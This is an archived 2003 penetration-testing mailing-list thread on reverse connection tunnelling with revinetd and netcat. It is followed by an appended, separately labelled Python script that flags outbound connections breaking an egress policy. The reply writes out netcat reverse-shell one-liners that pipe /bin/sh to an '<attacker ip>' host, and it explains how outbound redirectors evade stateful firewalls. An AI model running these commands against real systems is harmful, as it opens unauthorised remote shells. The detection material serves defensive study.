RE: command-line reverse connection tunnel?

From: Steven Gill (gman1120@hotmail.com)
Date: Sun Mar 16 2003 - 22:26:33 EST


Yes, you can use netcat to send a shell back, but it is a pain to use it for
port redirection. E.g. for a shell you can:

nc -l -p <port> -e /bin/sh

or

nc <attacker ip> 1234 | /bin/sh | nc <attacker ip> 1235

and have stdin and stdout connected to the above ports respectively. But we
want to use more robust services other than shell, such as getting GUI on
Windows via terminal services or other more complex protocols.

Let's take for example a service on a machine that is not NAT'd but a border
server we can compromise has access to it.

You can use rinetd, fpipe, stunnel, etc. for forward redirection. In these
cases, there need to be 2 holes punched through on the server, 1 for the
shell used to compromise the server (like www or telnet) and then the port
for the redirector to listen on. Revinetd is used for port redirection
where the server appears to be the initiator of the connectivity. You
theoretically only need one port open in the forward direction, which is the
shell. All other connectivity is initiated outbound from the server, so a
stateful firewall would see the port redirector traffic as NEW in the
connection table from the server, allowing us to utilize more liberal rule
sets that we know most organizations allow.

Now I know revinetd is not the only thing to use for it. It was brought to
my attention that socat can be used for this, but I wanted a tool that was
just used for reverse port forwarding and was intuitive to use.

I hope this answers your question.

Steve

>From: "Filip Maertens" <filip@securax.be>
>To: "'Steven Gill'" <gman1120@hotmail.com>,<pen-test@securityfocus.com>
>Subject: RE: command-line reverse connection tunnel?
>Date: Sat, 15 Mar 2003 23:57:32 +0100
>
> >have successfully tested it in a pen test situation in the lab for doing
> >reverse connectivity. I think this would be a valuable tool for all people
>
>I beg to differ.
>
>What exactly is different from using netcat listeners on both,
>attack-client and target machine? All in all, using a reverse telnet
>technique using netcat isn't very much of a big issue? I think this is
>a handy tool, but I would like to emphasize one can also use netcat in
>doing so (if this had been mentioned before in the "old posts",
>disregard this post, since I didn't follow this thread).
>
>
>Fil
>
>--
>Filip Maertens @ Home
>http://www.compsec.be
>
>
>----------------------------------------------------------------------------
>Did you know that you have VNC running on your network?
>Your hacker does. Plug your security holes now!
>Download a free 15-day trial of VAM:
>http://www2.stillsecure.com/download/sf_vuln_list.html
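The point Steve makes about the stateful firewall cuts both ways: because every
redirector session shows up as a NEW outbound connection from the server, a
border firewall that logs NEW outbound connections and a per-server egress
policy is exactly where this traffic can be caught. The following is an added
example for this thread, not code from the original post or from revinetd. It
parses netfilter LOG lines in the standard SRC=/DST=/PROTO=/SPT=/DPT= format and
checks them against a constructed egress allowlist; the "EGRESS-NEW:" log
prefix, the 10.0.5.x server addresses and the allowlist itself are assumptions
made up for the example.

```python
import re
from ipaddress import ip_address, ip_network

# Constructed sample netfilter LOG lines (not from the original thread). Each
# line records one NEW outbound connection seen by the border firewall.
SAMPLE_LOG = """\
Mar 16 22:01:10 border kernel: EGRESS-NEW: IN= OUT=eth0 SRC=10.0.5.20 DST=10.0.5.2 PROTO=UDP SPT=40001 DPT=53
Mar 16 22:01:12 border kernel: EGRESS-NEW: IN= OUT=eth0 SRC=10.0.5.20 DST=203.0.113.7 PROTO=TCP SPT=40002 DPT=80
Mar 16 22:26:33 border kernel: EGRESS-NEW: IN= OUT=eth0 SRC=10.0.5.20 DST=198.51.100.9 PROTO=TCP SPT=40003 DPT=1234
Mar 16 22:26:33 border kernel: EGRESS-NEW: IN= OUT=eth0 SRC=10.0.5.20 DST=198.51.100.9 PROTO=TCP SPT=40004 DPT=1235
Mar 16 22:27:05 border kernel: EGRESS-NEW: IN= OUT=eth0 SRC=10.0.5.21 DST=198.51.100.9 PROTO=TCP SPT=51000 DPT=443
"""

# Hypothetical egress policy for the DMZ web server 10.0.5.20: it may only
# initiate DNS to the internal resolver and HTTP/HTTPS to the update mirror.
# Servers with no entry are denied everything outbound by default.
EGRESS_POLICY = {
    "10.0.5.20": [
        (ip_network("10.0.5.2/32"), "UDP", 53),
        (ip_network("203.0.113.0/24"), "TCP", 80),
        (ip_network("203.0.113.0/24"), "TCP", 443),
    ],
}

# Fields of the netfilter LOG target; LEN/TTL/etc. between DST and PROTO are
# skipped by the lazy ".*?" so real kernel lines parse as well as the sample.
LOG_RE = re.compile(
    r"SRC=(?P<src>\S+) DST=(?P<dst>\S+) .*?"
    r"PROTO=(?P<proto>\S+) SPT=(?P<spt>\d+) DPT=(?P<dpt>\d+)"
)


def parse_new_connections(text, prefix="EGRESS-NEW:"):
    """Return one dict per logged NEW outbound connection carrying the prefix."""
    events = []
    for line in text.splitlines():
        if prefix not in line:
            continue
        m = LOG_RE.search(line)
        if not m:  # e.g. ICMP lines have no SPT/DPT; ignore them here
            continue
        events.append({
            "src": m["src"], "dst": m["dst"], "proto": m["proto"],
            "spt": int(m["spt"]), "dpt": int(m["dpt"]),
        })
    return events


def is_allowed(event, policy):
    """True when the server is permitted to initiate this destination/port."""
    rules = policy.get(event["src"])
    if rules is None:
        return False
    dst = ip_address(event["dst"])
    return any(dst in net and proto == event["proto"] and port == event["dpt"]
               for net, proto, port in rules)


def find_violations(text, policy=EGRESS_POLICY):
    """NEW outbound connections that the egress policy does not allow."""
    return [e for e in parse_new_connections(text) if not is_allowed(e, policy)]


def pair_by_destination(violations):
    """Group violations by (src, dst) and list the destination ports, so a
    server that opens several fresh sessions to one outside host (one for
    stdin, one for stdout, as in the netcat pipe above) stands out."""
    groups = {}
    for e in violations:
        groups.setdefault((e["src"], e["dst"]), []).append(e["dpt"])
    return {k: sorted(v) for k, v in groups.items()}


if __name__ == "__main__":
    hits = find_violations(SAMPLE_LOG)
    for (src, dst), ports in pair_by_destination(hits).items():
        print(f"egress violation: {src} -> {dst} ports {ports}")
```

With iptables the lines above come from a rule such as
`-A OUTPUT -m conntrack --ctstate NEW -j LOG --log-prefix "EGRESS-NEW: "`
on the server-facing interface; the prefix string is whatever you choose. On
the sample data the two DNS/HTTP sessions pass, while the server's sessions to
198.51.100.9 on 1234 and 1235, and the unlisted server 10.0.5.21, are reported.
The policy is the mitigation: a DMZ host that is only allowed to initiate the
handful of outbound flows its role needs cannot carry a reverse redirector
through a "liberal" outbound rule set.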




This archive was generated by hypermail 2.1.7 : Sat Apr 12 2008 - 10:53:30 EDT